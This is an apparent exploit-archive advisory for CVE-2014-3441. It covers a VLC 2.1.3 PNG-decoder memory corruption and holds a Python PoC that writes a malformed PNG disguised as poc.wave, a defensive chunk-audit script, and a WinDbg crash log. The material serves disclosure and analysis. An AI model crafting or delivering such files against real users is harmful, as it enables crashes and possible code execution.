VLC Player 2.1.3 Memory Corruption



EKU-ID: 4026 CVE: 2014-3441 OSVDB-ID:
Author: Aryan Bayaninejad Published: 2014-05-12 Verified: Verified

# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]
# Date: [2014/05/07]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.videolan.org]
# Software Link: [http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/]
# Version: [2.1.3 and prior]
# Tested on: [Windows Xp Sp 3 x86]
# CVE : [2014-3441]

details:

VLC media player 2.1.3 (the latest release at the time of writing) suffers from a memory corruption vulnerability when it decodes a malformed PNG file through codec\libpng_plugin.dll. VLC identifies the input by content rather than by file extension, so the PoC can be renamed to .wave (as the script below does) and is still routed through the image demuxer (demux\libimage_plugin.dll) to the PNG decoder. The debugger log below shows the demuxers probing the file in turn until libimage_plugin.dll and then libpng_plugin.dll are loaded, after which the process faults on a write inside msvcrt!memset; the faulting address in edi (018e5000) is page-aligned, which is consistent with the fill running past the end of its buffer into an unmapped page. !exploitable classifies the crash as an exploitable user-mode write access violation.


Poc:

#!/usr/bin/python
# Writes the malformed PNG as poc.wave; VLC probes the content, so the extension does not matter
data = (
    b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"                        # PNG signature
    b"\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF"        # IHDR: width 0x7FFFFFFF
    b"\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84"    # height 0x102, depth 1, colour type 3, CRC
    b"\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8"  # PLTE, one entry
    b"\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66"    # tRNS, one entry
    b"\x00\x68\x92\x01\x49\x44\x41\x54"                        # IDAT: declared length 0x689201, truncated
    b"\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
)
with open("poc.wave", "wb") as outfile:
    outfile.write(data)
print("Created Poc")
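As an added example (not code from the advisory or from VLC), the script below walks the PNG chunk layout of the PoC bytes above and reports what is structurally wrong with the file: the IHDR width of 0x7FFFFFFF, an IDAT that declares 0x689201 bytes but is followed by only 17, and no reachable IEND. MAX_DIMENSION is an assumed sanity limit chosen for this example, not a VLC constant, and the 32-bit size check is a generic decoder-hardening check, not a statement of VLC's root cause. The 1x1 control PNG is constructed inline so the same checks can be shown passing on a well-formed file.

```python
"""Walk the PNG chunk layout of the advisory's PoC and report what is malformed.

Added example, not code from the advisory or from VLC. POC_HEX is the byte
string written by the PoC script above; MAX_DIMENSION is an assumed sanity
limit for this example, not a VLC constant.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MAX_DIMENSION = 1 << 16  # assumed policy limit, not a value taken from VLC

# The 86 bytes of poc.wave from the advisory, as hex.
POC_HEX = (
    "89504E470D0A1A0A"                # PNG signature
    "0000000D49484452"                # IHDR, length 13
    "7FFFFFFF000001020103000000"      # width 0x7FFFFFFF, height 0x102, depth 1, type 3, 0, 0, 0
    "BA1BD884"                        # IHDR CRC as written in the PoC
    "00000003504C5445FFFFFFA7C41BC8"  # PLTE with one entry
    "0000000174524E530040E6D866"      # tRNS with one entry
    "0068920149444154"                # IDAT, declared length 0x689201
    "FF053A9265417168"                # the only IDAT bytes actually present ...
    "4249454E44AE426082"              # ... swallowing the would-be IEND chunk
)
POC = bytes.fromhex(POC_HEX)


def parse_chunks(data):
    """Return one record per chunk; stops at the first chunk that runs past end of file."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = pos + 8
        available = len(data) - body              # bytes left for payload + CRC
        truncated = available < length + 4
        payload = data[body:body + min(length, available)]
        crc_ok = None
        if not truncated:
            stored = struct.unpack(">I", data[body + length:body + length + 4])[0]
            crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == stored
        chunks.append({"type": ctype.decode("latin-1"), "declared": length,
                       "present": len(payload), "truncated": truncated,
                       "crc_ok": crc_ok, "payload": payload})
        if truncated or ctype == b"IEND":
            break
        pos = body + length + 4
    return chunks


def audit_png(data, max_dimension=MAX_DIMENSION):
    """Return (IHDR fields, list of findings) for a PNG byte string."""
    findings = []
    chunks = parse_chunks(data)
    first = chunks[0] if chunks else None
    if first is None or first["type"] != "IHDR" or first["truncated"] or first["declared"] != 13:
        return None, ["first chunk is not a complete 13-byte IHDR"]
    width, height, depth, colour, _comp, _filt, _interlace = struct.unpack(">IIBBBBB", first["payload"])
    ihdr = {"width": width, "height": height, "bit_depth": depth, "colour_type": colour}
    if width > max_dimension or height > max_dimension:
        findings.append(f"IHDR dimensions {width}x{height} exceed sanity limit {max_dimension}")
    # Generic hardening check: a 4-byte-per-pixel output buffer sized as width*height*4
    # would wrap a 32-bit size_t. This is not a statement of VLC's root cause.
    if width * height * 4 > 0xFFFFFFFF:
        findings.append(f"width*height*4 = {width * height * 4} does not fit in 32 bits")
    for chunk in chunks:
        if chunk["truncated"]:
            findings.append(f"{chunk['type']} declares {chunk['declared']} bytes "
                            f"but only {chunk['present']} are present")
        elif chunk["crc_ok"] is False:
            findings.append(f"{chunk['type']} CRC mismatch")
    if chunks[-1]["type"] != "IEND":
        findings.append("no IEND chunk reached")
    return ihdr, findings


def make_chunk(ctype, payload):
    """Build a chunk with a correct CRC, the way a well-formed encoder would."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_valid_png():
    """Constructed control input: a minimal 1x1 8-bit greyscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 followed by one grey pixel
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b""))


if __name__ == "__main__":
    for name, blob in (("poc.wave", POC), ("control.png", make_valid_png())):
        ihdr, findings = audit_png(blob)
        print(name, ihdr, findings or ["no findings"])
```

Running it prints the parsed IHDR of each input and the findings list; the PoC yields the oversized width, the 32-bit size wrap, the truncated IDAT and the missing IEND, while the control file yields none. The parser stops at the first chunk whose declared length runs past end of file, which is exactly the condition a decoder must check before trusting a chunk length for any allocation or read.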
windbg result:


Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00426000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000   C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000   C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000   C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000   C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:000> g
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 64fc0000 65008000   C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000   C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000   C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000   C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000   C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000   C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000   C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000   C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000   C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000   C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000   C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000   C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000   C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000   C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000   C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000   C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000   C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
ModLoad: 68e80000 6992e000   C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000   C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000   C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000   C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000   C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000   C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000   C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000   C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000   C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000   C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000   C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000   C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000   C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000   C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000   C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab            rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)

User mode write access violations that are not near NULL are exploitable.